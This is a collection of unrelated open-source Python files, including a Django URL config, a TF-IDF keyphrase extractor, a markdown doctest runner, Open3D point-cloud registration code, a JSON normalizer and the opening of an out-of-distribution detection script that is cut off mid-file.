    url(r'^follow/?$', views.follow, name='social-follow'),
    url(r'^unfollow/?$', views.unfollow, name='social-unfollow'),
    url(r'^approve_follower/?$', views.approve_follower, name='social-approve-follower'),
    url(r'^ignore_follower/?$', views.ignore_follower, name='social-ignore-follower'),
    url(r'^feed_trainer', views.social_feed_trainer, name='social-feed-trainer'),
    # Comments and likes.
    url(r'^public_comments/?$', views.story_public_comments, name='story-public-comments'),
    url(r'^save_comment_reply/?$', views.save_comment_reply, name='social-save-comment-reply'),
    url(r'^remove_comment_reply/?$', views.remove_comment_reply, name='social-remove-comment-reply'),
    url(r'^find_friends/?$', views.find_friends, name='social-find-friends'),
    url(r'^like_comment/?$', views.like_comment, name='social-like-comment'),
    url(r'^remove_like_comment/?$', views.remove_like_comment, name='social-remove-like-comment'),
    # url(r'^like_reply/?$', views.like_reply, name='social-like-reply'),
    # url(r'^remove_like_reply/?$', views.remove_like_reply, name='social-remove-like-reply'),
    url(r'^comment/(?P<comment_id>\w+)/reply/(?P<reply_id>\w+)/?$', views.comment_reply, name='social-comment-reply'),
    url(r'^comment/(?P<comment_id>\w+)/?$', views.comment, name='social-comment'),
    # Per-user pages, feeds and settings.
    url(r'^rss/(?P<user_id>\d+)/?$', views.shared_stories_rss_feed, name='shared-stories-rss-feed'),
    url(r'^rss/(?P<user_id>\d+)/(?P<username>[-\w]+)?$', views.shared_stories_rss_feed, name='shared-stories-rss-feed'),
    url(r'^stories/(?P<user_id>\w+)/(?P<username>[-\w]+)?/?$', views.load_social_stories, name='load-social-stories'),
    url(r'^page/(?P<user_id>\w+)/(?P<username>[-\w]+)?/?$', views.load_social_page, name='load-social-page'),
    url(r'^settings/(?P<social_user_id>\w+)/(?P<username>[-\w]+)?/?$', views.load_social_settings, name='load-social-settings'),
    url(r'^statistics/(?P<social_user_id>\w+)/(?P<username>[-\w]+)/?$', views.load_social_statistics, name='load-social-statistics'),
    url(r'^statistics/(?P<social_user_id>\w+)/?$', views.load_social_statistics, name='load-social-statistics'),
    url(r'^mute_story/(?P<secret_token>\w+)/(?P<shared_story_id>\w+)?$', views.mute_story, name='social-mute-story'),
    url(r'^(?P<username>[-\w]+)/?$', views.shared_stories_public, name='shared-stories-public'),
]
| 1.679688 | 2 |
concept_extractor/extractor.py | fossabot/grafit | 0 | 12766408 | <reponame>fossabot/grafit
import abc
import csv
from textblob import TextBlob as tb
import math
from pkg_resources import resource_string
class ExtractStrategyAbstract(abc.ABC):
    """Abstract strategy class for the extract method.

    Fix: the class previously assigned ``__metaclass__ = abc.ABCMeta``,
    which is a Python 2 idiom and has no effect on Python 3, so the
    abstract method was never actually enforced.  Inheriting from
    ``abc.ABC`` restores the enforcement.
    """

    @abc.abstractmethod
    def extract_keyphrases(self, text: str):
        """Required Method"""


class FakeExtractStrategy(ExtractStrategyAbstract):
    """Trivial stand-in strategy for testing; always returns ["test"]."""

    def extract_keyphrases(self, text: str):
        return ["test"]
class TextblobTfIdfExtractStrategy(ExtractStrategyAbstract):
    """Keyphrase extraction via TF-IDF scored against a bundled article corpus."""

    def __init__(self):
        # The corpus is loaded from package resources once per instance.
        self.corpus = self.load_corpus()

    def tf(self, word, blob):
        # Term frequency: share of the blob's words that equal `word`.
        return blob.words.count(word) / len(blob.words)

    def n_containing(self, word, corpus):
        # Number of corpus documents containing `word`.
        return sum(1 for blob in corpus if word in blob.words)

    def idf(self, word, corpus):
        # Inverse document frequency; +1 guards against division by zero
        # for words absent from the corpus.
        return math.log(len(corpus) / (1 + self.n_containing(word, corpus)))

    def tfidf(self, word, blob, corpus):
        return self.tf(word, blob) * self.idf(word, corpus)

    def load_corpus(self):
        # Load the bundled CSV of articles and turn each row's
        # title + body (columns 1 and 2) into a TextBlob document.
        raw_csv = resource_string(
            'resources', 'grafit_public_article.csv').decode('utf-8').splitlines()
        results = list(csv.reader(raw_csv, delimiter=','))
        tbs = []
        for result in results:
            tbs.append(tb(result[1] + " " + result[2]))
        return tbs

    def extract_keyphrases(self, text: str, top_n_words=5):
        """Return the `top_n_words` highest TF-IDF words of `text`
        as dicts of the form {"word": ..., "tf-idf": ...}."""
        result = []
        blob = tb(text)
        scores = {word: self.tfidf(word, blob, self.corpus)
                  for word in blob.words}
        sorted_words = sorted(scores.items(), key=lambda x: x[1], reverse=True)
        for word, score in sorted_words[:top_n_words]:
            result.append({
                "word": word,
                "tf-idf": score
            })
        return result
def main():
    """Demo entry point: print keyphrases extracted from a sample paragraph."""
    sample = "Vulkan Vulkan Vulkan Ollagüe (Spanish pronunciation: [oˈʝaɣwe]) or Ullawi (Aymara pronunciation: [uˈʎawi]) is a massive andesite stratovolcano in the Andes on the border between Bolivia and Chile, within the Antofagasta Region of Chile and the Potosi Department of Bolivia. Part of the Central Volcanic Zone of the Andes, its highest summit is 5,868 metres (19,252 ft) above sea level and features a summit crater that opens to the south. The western rim of the summit crater is formed by a compound of lava domes, the youngest of which features a vigorous fumarole that is visible from afar."
    extractor = TextblobTfIdfExtractStrategy()
    print(extractor.extract_keyphrases(sample))


if __name__ == '__main__':
    main()
| 2.765625 | 3 |
steadymark/runner.py | gabrielfalcao/steadymark | 6 | 12766409 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# <steadymark - markdown-based test runner for python>
# Copyright (C) <2012-2020> <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import os
import sys
import traceback
import codecs
# couleur is an optional dependency: when it is missing, fall back to plain
# (non-ANSI) terminal output instead of failing at import time.
try:
    from couleur import SUPPORTS_ANSI
except ImportError:
    SUPPORTS_ANSI = False
from steadymark.core import SteadyMark, DocTestFailure
def extract_example(exc, attribute_name):
    """Return *attribute_name* from a doctest failure's ``example``, if any.

    ``doctest.DocTestFailure`` carries the failing ``doctest.Example`` in its
    ``example`` attribute; ``lineno``, ``source``, ``want`` and ``exc_msg``
    live on that Example, not on the exception itself.  The original looked
    the attribute up on *exc*, so it always returned ``None``.

    Returns ``None`` when there is no example or it lacks the attribute.
    """
    example = getattr(exc, "example", None)
    if not example:
        return None
    return getattr(example, attribute_name, None)
class Runner(object):
    """Load markdown from a file or string and run its doctests, printing
    colored (ANSI) results to stdout when the ``couleur`` package is present.
    """

    def __init__(self, filename=None, text=""):
        """Parse *filename* (or the literal *text*) into a SteadyMark suite.

        Exits the process with status 1 when *filename* does not exist.
        """
        if filename and not os.path.exists(filename):
            print(("steadymark could not find {0}".format(filename)))
            sys.exit(1)

        if filename:
            raw_md = codecs.open(filename, "rb", "utf-8").read()
            text = str(raw_md)

        self.steadymark = SteadyMark.inspect(text)
        self.filename = filename
        self.text = text

    def print_white(self, text, indentation=0):
        """Print *text* line by line in bold white (plain when ANSI is off)."""
        white = {True: "\033[1;37m", False: ""}
        for line in text.splitlines():
            print(
                (
                    "{1}{2}{0}\033[0m".format(
                        line, " " * indentation, white[SUPPORTS_ANSI]
                    )
                )
            )

    def __getattr__(self, attr):
        """Fabricate ``print_red``/``print_green``/``print_yellow`` helpers.

        Only invoked for attributes not found normally; any other name is
        delegated to the default lookup.  Each fabricated helper prints the
        given text in its color, honoring SUPPORTS_ANSI.
        """
        if attr not in ("print_white", "print_green", "print_red", "print_yellow"):
            return super(Runner, self).__getattribute__(attr)

        color_for = {
            "print_white": "\033[1;37m",
            "print_red": "\033[1;31m",
            "print_green": "\033[1;32m",
            "print_yellow": "\033[1;33m",
        }
        ansi = color_for[attr]
        if SUPPORTS_ANSI:
            color = ansi
            no_color = "\033[0m"
        else:
            no_color = color = ""

        def printer(text, indentation=0):
            # Closure over the chosen color/reset codes.
            for line in text.splitlines():
                print(("{1}{2}{0}{3}".format(line, " " * indentation, color, no_color)))

        return printer

    def format_ms(self, ms):
        """Format a millisecond count, yellow-highlighted when ANSI is on."""
        ms = int(ms)
        base = "{0}ms".format(ms)
        if SUPPORTS_ANSI:
            return "\033[1;33m{0}\033[0m".format(base)
        else:
            return base

    def format_traceback(self, test, failure):
        """Render a (type, instance, traceback) triple, rewriting the synthetic
        file name used for markdown snippets into the test title.
        """
        exc, exc_instance, tb = failure
        # formatted_tb = traceback.format_exc(exc_instance).strip()
        # if 'None' == formatted_tb:
        formatted_tb = "".join(traceback.format_tb(tb))
        formatted_tb = formatted_tb.replace(
            'File "{0}"'.format(test.title), 'In the test "{0}"'.format(test.title)
        )
        formatted_tb = formatted_tb.replace("@STEADYMARK@", str(test.title))
        if SUPPORTS_ANSI:
            color = "\033[1;36m"
        else:
            color = ""
        return "{0} {3}{1}\n{2}\n".format(
            exc.__name__, exc_instance, formatted_tb, color
        )

    def report_success(self, test, shift, ms):
        """Print a green check mark plus the elapsed time."""
        self.print_green("\u2714 {0}".format(ms))
        print()

    def report_failure(self, test, failure, shift, ms):
        """Print a red cross, the failure details, and the original snippet.

        Doctest failures get a custom "line/source/expected vs got" rendering;
        everything else goes through :meth:`format_traceback`.
        """
        self.print_red("\u2718 {0}".format(ms))

        exc_type, exc_val, exc_tb = failure
        if exc_type is DocTestFailure:
            formatted_tb = "the line {0}: {1}\n".format(
                extract_example(exc_val, "lineno"), extract_example(exc_val, "source")
            )
            if extract_example(exc_val, "exc_msg"):
                formatted_tb += "{0}\n".format(extract_example(exc_val, "exc_msg"))
            else:
                formatted_tb += "resulted in:\n{0}\n" "when expecting:\n{1}\n".format(
                    exc_val.got, extract_example(exc_val, "want")
                )
        else:
            formatted_tb = self.format_traceback(test, failure)

        self.print_red(formatted_tb, indentation=2)
        header = "original code:"
        header_length = len(header)
        self.print_white("*" * header_length)
        self.print_white(header)
        self.print_white("*" * header_length)
        for number, line in enumerate(test.raw_code.splitlines(), start=1):
            # NOTE(review): this compares a source *line* (str) against the
            # failure's *lineno* (int), so the red highlight can never match --
            # looks like it should compare ``number`` instead; confirm upstream.
            if line == extract_example(exc_val, "lineno"):
                self.print_red("{0}: {1}".format(number, line), indentation=2)
            else:
                self.print_yellow("{0}: {1}".format(number, line), indentation=2)
        print()

    def report_test_result(self, test, failure, before, after):
        """Dispatch to the success or failure reporter with the elapsed time."""
        # NOTE(review): ``before - after`` is negative if *before* is the start
        # timestamp; the microseconds of a negative timedelta would be wrong.
        # Verify the ordering against SteadyMark's ``test.run()`` contract.
        shift = before - after
        ms = self.format_ms(shift.microseconds / 1000)
        if not failure:
            return self.report_success(test, shift, ms)

        return self.report_failure(test, failure, shift, ms)

    def run(self):
        """Run every test, report each result, and exit non-zero on failure.

        Returns the SteadyMark suite when all tests pass.
        """
        if self.filename:
            print(("Running tests from {0}".format(self.filename)))

        exit_status = 0
        for test in self.steadymark.tests:
            title = "{0} ".format(test.title)
            title_length = len(title)
            print(("." * title_length))
            sys.stdout.write(title)
            result, failure, before, after = test.run()
            if failure:
                exit_status = 1
            self.report_test_result(test, failure, before, after)

        if exit_status != 0:
            sys.exit(exit_status)

        return self.steadymark
| 2.140625 | 2 |
surface_matching.py | minhncedutw/record_segment_match_grasp | 0 | 12766410 | <reponame>minhncedutw/record_segment_match_grasp
'''
File name: HANDBOOK
Author: minhnc
Date created(MM/DD/YYYY): 12/10/2018
Last modified(MM/DD/YYYY HH:MM): 12/10/2018 9:45 AM
Python Version: 3.6
Other modules: [None]
Copyright = Copyright (C) 2017 of <NAME>
Credits = [None] # people who reported bug fixes, made suggestions, etc. but did not actually write the code
License = None
Version = 0.9.0.1
Maintainer = [None]
Email = <EMAIL>
Status = Prototype # "Prototype", "Development", or "Production"
Code Style: http://web.archive.org/web/20111010053227/http://jaynes.colorado.edu/PythonGuidelines.html#module_formatting
'''
#==============================================================================
# Imported Modules
#==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os.path
import sys
import time
# Pin CUDA device enumeration to PCI bus order (so IDs match nvidia-smi) and
# expose a single GPU to this process.
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0" # The GPU id to use, usually either "0" or "1"
#==============================================================================
# Constant Definitions
#==============================================================================
#==============================================================================
# Function Definitions
#==============================================================================
# [Source](https://www.learnopencv.com/rotation-matrix-to-euler-angles/)
import math
# Checks if a matrix is a valid rotation matrix.
def isRotationMatrix(R):
    """Return True when *R* is (numerically) a valid 3x3 rotation matrix.

    A rotation matrix is orthogonal, i.e. R^T R == I; we accept a small
    tolerance on the Frobenius norm of the deviation from identity.
    NOTE(review): this module uses ``np`` but no ``import numpy as np`` is
    visible at the top of the file -- verify the import exists.
    """
    gram = np.dot(np.transpose(R), R)
    identity = np.identity(3, dtype=R.dtype)
    deviation = np.linalg.norm(identity - gram)
    return deviation < 1e-6
# Calculates rotation matrix to euler angles
# The result is the same as MATLAB except the order
# of the euler angles ( x and z are swapped ).
def rotationMatrixToEulerAngles(R):
    """Convert a 3x3 rotation matrix *R* to Euler angles [x, y, z] in radians.

    Matches MATLAB's result except that the x and z angles are swapped.
    Raises AssertionError when *R* is not a valid rotation matrix.
    """
    assert (isRotationMatrix(R))

    # sy ~ |cos(y)|; near zero we are at the gimbal-lock singularity
    # (y ~ +/-90 degrees), where x and z are no longer independent.
    sy = math.sqrt(R[0, 0] * R[0, 0] + R[1, 0] * R[1, 0])

    singular = sy < 1e-6

    if not singular:
        x = math.atan2(R[2, 1], R[2, 2])
        y = math.atan2(-R[2, 0], sy)
        z = math.atan2(R[1, 0], R[0, 0])
    else:
        # Gimbal lock: fix z = 0 and fold the remaining rotation into x.
        x = math.atan2(-R[1, 2], R[1, 1])
        y = math.atan2(-R[2, 0], sy)
        z = 0

    return np.array([x, y, z])
import open3d as op3
from open3d import *
import copy
def preprocess_point_cloud(pcd, voxel_size):
    """Downsample *pcd*, estimate normals, and compute FPFH features.

    Search radii are derived from *voxel_size* (2x for normals, 5x for
    features).  Returns a (downsampled_cloud, fpfh_features) pair.
    """
    print(":: Downsample with a voxel size %.3f." % voxel_size)
    downsampled = op3.voxel_down_sample(pcd, voxel_size)

    normal_radius = voxel_size * 2
    print(":: Estimate normal with search radius %.3f." % normal_radius)
    op3.estimate_normals(downsampled, op3.KDTreeSearchParamHybrid(radius=normal_radius, max_nn=30))

    feature_radius = voxel_size * 5
    print(":: Compute FPFH feature with search radius %.3f." % feature_radius)
    fpfh = op3.compute_fpfh_feature(downsampled, op3.KDTreeSearchParamHybrid(radius=feature_radius, max_nn=100))
    return downsampled, fpfh
def draw_registration_result(source, target, transformation):
    """Visualize *source* (red) aligned onto *target* (blue) by *transformation*.

    Deep copies are drawn so the input clouds are left untouched.
    """
    src = copy.deepcopy(source)
    tgt = copy.deepcopy(target)
    src.paint_uniform_color([1, 0, 0])
    tgt.paint_uniform_color([0, 0, 1])
    src.transform(transformation)
    draw_geometries([src, tgt])
def execute_global_registration(source_down, target_down, source_fpfh, target_fpfh, voxel_size):
    """Coarse global alignment of downsampled clouds via RANSAC + FPFH matching.

    Returns the Open3D registration result whose ``transformation`` maps
    ``source_down`` onto ``target_down``.
    """
    distance_threshold = voxel_size * 1.5
    print(":: RANSAC registration on downsampled point clouds.")
    print(" Since the downsampling voxel size is %.3f," % voxel_size)
    print(" we use a liberal distance threshold %.3f." % distance_threshold)
    # Prune candidate correspondences by edge-length ratio and distance.
    checkers = [op3.CorrespondenceCheckerBasedOnEdgeLength(0.9),
                op3.CorrespondenceCheckerBasedOnDistance(distance_threshold)]
    return op3.registration_ransac_based_on_feature_matching(
        source_down, target_down, source_fpfh, target_fpfh,
        distance_threshold,
        op3.TransformationEstimationPointToPoint(False), 4,
        checkers,
        op3.RANSACConvergenceCriteria(4000000, 500)
    )
def refine_registration(source, target, voxel_size, gross_matching):
    """Refine a coarse alignment with point-to-plane ICP on the full clouds.

    *gross_matching* is the result of the global RANSAC step; its
    ``transformation`` seeds the ICP iteration.
    """
    distance_threshold = voxel_size * 0.4
    print(":: Point-to-plane ICP registration is applied on original point")
    print(" clouds to refine the alignment. This time we use a strict")
    print(" distance threshold %.3f." % distance_threshold)
    return op3.registration_icp(source, target, distance_threshold,
                                gross_matching.transformation,
                                op3.TransformationEstimationPointToPlane(),
                                op3.ICPConvergenceCriteria(max_iteration=2000))
#==============================================================================
# Main function
#==============================================================================
def main(argv=None):
    """Demo entry point: greet, then echo any command-line arguments."""
    print('Hello! This is XXXXXX Program')

    args_list = sys.argv if argv is None else argv
    # Echo every argument after the program name, one per line.
    for extra in args_list[1:]:
        print(extra)


if __name__ == '__main__':
    main()
| 1.578125 | 2 |
setup.py | Muzix1/newpackage | 0 | 12766411 | from setuptools import setup, find_packages
# Package metadata for the example distribution.
setup(
    name='newpackage',
    version='0.10',
    packages=find_packages(exclude=['tests*']),
    license='MIT',
    description='Another EDSA example python packages',
    long_description=open('README.md').read(),
    # Fix: the original passed ``install_requirements=``, an unknown keyword
    # that setuptools silently ignores -- the numpy dependency was therefore
    # never declared.  The correct keyword is ``install_requires``.
    install_requires=['numpy'],
    url='https://github.com/Muzix1/newpackage',
    author='<NAME>',
    author_email='<EMAIL>'
)
db.py | Aida2gl/sg | 0 | 12766412 | #!/usr/bin/env python
import json
import sys
def validate(input):
    """Exit with status 1 (and a stderr message) unless *input* is already
    in its normalized form."""
    if normalize_internal(input) != input:
        sys.stderr.write("Input is not normalized.\n")
        sys.exit(1)
def normalize_internal(input):
    """Return the normalized JSON serialization of *input*, newline-terminated."""
    db = normalize_db(json.loads(input))
    serialized = json.dumps(db, ensure_ascii=False, allow_nan=False, sort_keys=False, indent=2)
    return serialized + "\n"
def normalize(input):
    """Overwrite db.json with the normalized form of *input*.

    Fix: use a context manager so the file handle is flushed and closed
    deterministically (the original relied on CPython refcounting to close
    the handle returned by ``open``).
    """
    with open("db.json", "w") as f:
        f.write(normalize_internal(input))
def normalize_db(db):
    """Normalize the three top-level collections of the database in place."""
    sections = [
        ("workstreams", normalize_workstream, "name"),
        ("ideas", normalize_workstream_standard_or_idea, "name"),
        ("biblio", normalize_reference, "title"),
    ]
    for key, algorithm, sort_key in sections:
        db[key] = normalize_list(db[key], algorithm, sort_key)
    return db
def normalize_list(input, normalize_algorithm, sort_key):
    """Apply *normalize_algorithm* to each item and sort the result by
    *sort_key* (stable sort, like the original list.sort)."""
    return sorted((normalize_algorithm(item) for item in input),
                  key=lambda item: item[sort_key])
def normalize_workstream(workstream):
    """Return a workstream dict with a fixed key order and normalized members.

    Key order matters: the serializer uses ``sort_keys=False``, so insertion
    order is what ends up in db.json.
    """
    normalized = {
        "id": workstream["id"],
        "name": workstream["name"],
        "scope": workstream["scope"],
    }
    normalized["editors"] = normalize_list(workstream["editors"], normalize_person, "name")
    normalized["standards"] = normalize_list(workstream["standards"], normalize_workstream_standard, "name")
    return normalized
def normalize_person(editor):
    """Normalize a person record to its name plus an optional email (None
    when absent)."""
    return {"name": editor["name"], "email": editor.get("email", None)}
def normalize_workstream_standard(document):
    """Normalize a standard: the shared fields plus schedule and twitter."""
    normalized = normalize_workstream_standard_or_idea(document)
    normalized["review_draft_schedule"] = document["review_draft_schedule"]
    normalized["twitter"] = document["twitter"]
    return normalized
def normalize_workstream_standard_or_idea(document):
    """Normalize the fields shared by standards and ideas, in a fixed order."""
    normalized = {
        "name": document["name"],
        "href": document["href"],
        "description": document["description"],
    }
    normalized["authors"] = normalize_list(document["authors"], normalize_person, "name")
    normalized["reference"] = document["reference"]
    return normalized
def normalize_reference(reference):
    """Normalize a bibliography entry; ``obsoletedBy`` is kept only when present."""
    normalized = {
        "title": reference["title"],
        "href": reference["href"],
        "authors": normalize_list(reference["authors"], normalize_person, "name"),
        "reference": reference["reference"],
    }
    if "obsoletedBy" in reference:
        normalized["obsoletedBy"] = reference["obsoletedBy"]
    return normalized
def usage():
    """Print command-line help to stderr and exit with status 0."""
    message = """Usage: %s [command]
Commands:
* validate -- Checks that db.json is normalized.
* normalize -- Normalizes db.json.
""" % sys.argv[0]
    sys.stderr.write(message)
    sys.exit(0)
def main():
    """Dispatch to validate/normalize according to the first CLI argument.

    Unknown or missing commands print usage and exit.
    """
    command = None
    try:
        command = sys.argv[1]
    except IndexError:
        usage()
    if command not in ["validate", "normalize"]:
        usage()
    else:
        # Fix: close the file handle deterministically; also avoid shadowing
        # the ``input`` builtin.
        with open("db.json", "r") as f:
            data = f.read()
        if command == "validate":
            validate(data)
        elif command == "normalize":
            normalize(data)
        else:
            assert False, "Unreachable code."


# Fix: the original called main() unconditionally, so merely importing this
# module ran the CLI (and usually exited the process).  Guard the entry point.
if __name__ == "__main__":
    main()
| 2.78125 | 3 |
pydeap/feature_extraction/__init__.py | Wlgls/pyDEAP | 0 | 12766413 | # -*- encoding: utf-8 -*-
'''
@File :__init__.py
@Time :2021/03/28 19:18:16
@Author :wlgls
@Version :1.0
'''
from ._time_domain_features import statistics
from ._time_domain_features import hjorth
from ._time_domain_features import higher_order_crossing
from ._time_domain_features import sevcik_fd
from ._time_domain_features import higuchi_fd
from ._frequency_domain_features import power_spectral_density
from ._frequency_domain_features import bin_power
from ._wavelet_features import wavelet_features | 1.171875 | 1 |
src/test_detection.py | lhj815/wide-resnet.pytorch | 0 | 12766414 | <gh_stars>0
from __future__ import print_function
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import config as cf
import torchvision
import torchvision.transforms as transforms
import os
import sys
import time
import argparse
import datetime
from networks import *
from torch.autograd import Variable
import random
from utils import *
import calculate_log as callog
# Training settings
# Command-line options for the OOD-detection evaluation run (model choice,
# in/out-of-distribution datasets, scoring mode, and ODIN-style knobs).
parser = argparse.ArgumentParser(description='PyTorch CIFAR-10 Training')
parser.add_argument('--lr', default=0.1, type=float, help='learning_rate')
parser.add_argument('--net_type', default='wide-resnet', type=str, help='model')
parser.add_argument('--depth', default=28, type=int, help='depth of model')
parser.add_argument('--widen_factor', default=10, type=int, help='width of model')
parser.add_argument('--dropout', default=0.3, type=float, help='dropout_rate')
parser.add_argument('--dataset', default='cifar10', type=str, help='dataset = [cifar10/cifar100]')
parser.add_argument('--out_dataset', default='SVHN', type=str, help='dataset = [cifar10/cifar100/SVHN/Tiny]')
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
parser.add_argument('--testOnly', '-t', action='store_true', help='Test mode with the saved model')
parser.add_argument('--inferOnly', '-infer', action='store_true', help='inference mode with the saved model (without accuracy)')
parser.add_argument('--loss', '-l', default='ce', help='ce / bce / bce_and_ce / temper')
parser.add_argument('--mode', default='sigmoid', help='sigmoid / softmax / etc')
parser.add_argument('--outf', default='./results/test_detection/', help='folder to output images and model checkpoints')
parser.add_argument('--check_point', default=None)
parser.add_argument('--input_preproc_noise_magni', default=None, type=float, help='0.0014')
parser.add_argument('--odin', default=None, type=float, help='1000')
parser.add_argument('--batch_size', default=100, type=int)
args = parser.parse_args()
print(args)
# Hyper Parameter settings
# Global run settings; most schedule values come from the shared config module.
use_cuda = torch.cuda.is_available()
best_acc = 0
start_epoch, num_epochs, batch_size, optim_type = cf.start_epoch, cf.num_epochs, args.batch_size, cf.optim_type
# Setting_Dir
# NOTE(review): ``datetime`` is already imported at the top of the file, so
# this import is redundant; also ``os.makedirs`` raises if the output
# directory already exists -- ``exist_ok=True`` may be intended.
import datetime
args.outf = str(args.outf)
os.makedirs(args.outf)
# Data Uplaod
# Build the train/test preprocessing pipelines.  Both normalize with the
# per-dataset mean/std from the config module; the commented variants below
# are the un-normalized alternatives kept for reference.
print('\n[Phase 1] : Data Preparation')
transform_train = transforms.Compose([
    transforms.RandomCrop(32, padding=4),
    transforms.RandomHorizontalFlip(),
    transforms.ToTensor(),
    transforms.Normalize(cf.mean[args.dataset], cf.std[args.dataset]),
]) # meanstd transformation
transform_test = transforms.Compose([
    transforms.Resize(32),
    transforms.ToTensor(),
    transforms.Normalize(cf.mean[args.dataset], cf.std[args.dataset]),
])
# transform_train = transforms.Compose([
#     transforms.RandomCrop(32, padding=4),
#     transforms.RandomHorizontalFlip(),
#     transforms.ToTensor(),
# ]) # meanstd transformation
# transform_test = transforms.Compose([
#     transforms.Resize(32),
#     transforms.ToTensor(),
# ])
# In-distribution dataset: sets ``trainset``/``testset`` and ``num_classes``.
if(args.dataset == 'cifar10'):
    print("| Preparing CIFAR-10 dataset...")
    sys.stdout.write("| ")
    trainset = torchvision.datasets.CIFAR10(root='../data', train=True, download=True, transform=transform_train)
    testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=False, transform=transform_test)
    num_classes = 10
elif(args.dataset == 'cifar100'):
    print("| Preparing CIFAR-100 dataset...")
    sys.stdout.write("| ")
    trainset = torchvision.datasets.CIFAR100(root='../data', train=True, download=True, transform=transform_train)
    testset = torchvision.datasets.CIFAR100(root='../data', train=False, download=False, transform=transform_test)
    num_classes = 100
# Out-of-distribution dataset: builds ``nt_test_loader`` ("non-target").
# NOTE(review): an unrecognized --out_dataset value leaves nt_test_loader
# undefined and fails later in generate_non_target().
if (args.out_dataset == 'SVHN'):
    print("| Preparing SVHN dataset for out-of-distrib....")
    sys.stdout.write("| ")
    # trainset = torchvision.datasets.SVHN(root='./data', train=True, download=True, transform=transform_train)
    trainset = None
    out_testset = torchvision.datasets.SVHN(root='../data', split='test', download=True, transform=transform_test)
    nt_test_loader = torch.utils.data.DataLoader(out_testset, batch_size=batch_size, shuffle=False, num_workers=2)
    # num_classes = 10
elif (args.out_dataset == 'Tiny'):
    print("| Preparing Tiny_ImageNet dataset for out-of-distrib....")
    sys.stdout.write("| ")
    trainset = None
    out_testset = torchvision.datasets.ImageFolder("../data/Imagenet/", transform=transform_test)
    nt_test_loader = torch.utils.data.DataLoader(out_testset, batch_size=batch_size, shuffle=False, num_workers=2)
    # num_classes = 10
elif (args.out_dataset == 'cifar100'):
    print("| Preparing CIFAR-100 dataset for out-of-distrib.......")
    sys.stdout.write("| ")
    trainset = None
    out_testset = torchvision.datasets.CIFAR100(root='../data', train=False, download=True, transform=transform_test)
    nt_test_loader = torch.utils.data.DataLoader(out_testset, batch_size=batch_size, shuffle=False, num_workers=2)
    # num_classes = 100
elif (args.out_dataset == 'LSUN_resize'):
    print("| Preparing LSUN_resize dataset for out-of-distrib....")
    sys.stdout.write("| ")
    trainset = None
    out_testset = torchvision.datasets.ImageFolder("../data/LSUN_resize/", transform=transform_test)
    nt_test_loader = torch.utils.data.DataLoader(out_testset, batch_size=batch_size, shuffle=False, num_workers=2)
    # num_classes = 10
# trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)
# #####################################################################
# ################ img extract
# transform_extract = transforms.Compose([
# transforms.ToTensor(),
# ])
# # extracter = torchvision.datasets.CIFAR100(root='../data', train=False, download=False, transform=transform_test)
# # extract_loader = torch.utils.data.DataLoader(extracter, batch_size=100, shuffle=False, num_workers=2)
# extracter = torchvision.datasets.ImageFolder("../data/Imagenet/", transform=transform_extract)
# extract_loader = torch.utils.data.DataLoader(extracter, batch_size=100, shuffle=True, num_workers=2)
# import cv2
# for batch_idx, (inputs, targets) in enumerate(extract_loader):
# # inputs = inputs.numpy().transpose(0,2,3,1) * 255
# inputs = inputs.numpy().transpose(0,2,3,1) * 255
# for i in range(len(targets)):
# # print(targets[i].item())
# cv2.imwrite('imgs/Imagenet/%d_%d.png'%(batch_idx, i), cv2.cvtColor(inputs[i], cv2.COLOR_RGB2BGR))
# # cv2.imwrite('imgs/Imagenet/%d_%d.png'%(batch_idx, i), inputs[i])
# # if targets[i].item() == 23 :
# # cv2.imwrite('imgs/sample/%d_%d_%d.png'%(targets[i], batch_idx, i), inputs[i])
# # cv2.imwrite('imgs/sample/%d_%d_%d.png'%(targets[i], batch_idx, i), cv2.cvtColor(inputs[i], cv2.COLOR_RGB2BGR))
# if batch_size * batch_idx > 1000 :
# exit()
# exit()
# ######################################################################
# Return network & file name
def getNetwork(args):
    """Instantiate the network selected by ``args.net_type``.

    Returns a (network, file_name) pair where *file_name* encodes the
    architecture for checkpoint lookup.  Exits the process on an unknown
    network type.
    """
    net_type = args.net_type
    if (net_type == 'lenet'):
        return LeNet(num_classes), 'lenet'
    if (net_type == 'vggnet'):
        return VGG(args.depth, num_classes), 'vgg-'+str(args.depth)
    if (net_type == 'resnet'):
        return ResNet(args.depth, num_classes), 'resnet-'+str(args.depth)
    if (net_type == 'wide-resnet'):
        net = Wide_ResNet(args.depth, num_classes, args.widen_factor, dropRate=args.dropout)
        return net, 'wide-resnet-'+str(args.depth)+'x'+str(args.widen_factor)
    print('Error : Network should be either [LeNet / VGGNet / ResNet / Wide_ResNet')
    sys.exit(0)
# Load the trained network from a serialized checkpoint and put it in eval
# mode; the checkpoint dict stores the full module under 'net'.
assert os.path.isdir('checkpoint'), 'Error: No checkpoint directory found!'
_, file_name = getNetwork(args)
if args.check_point is None :
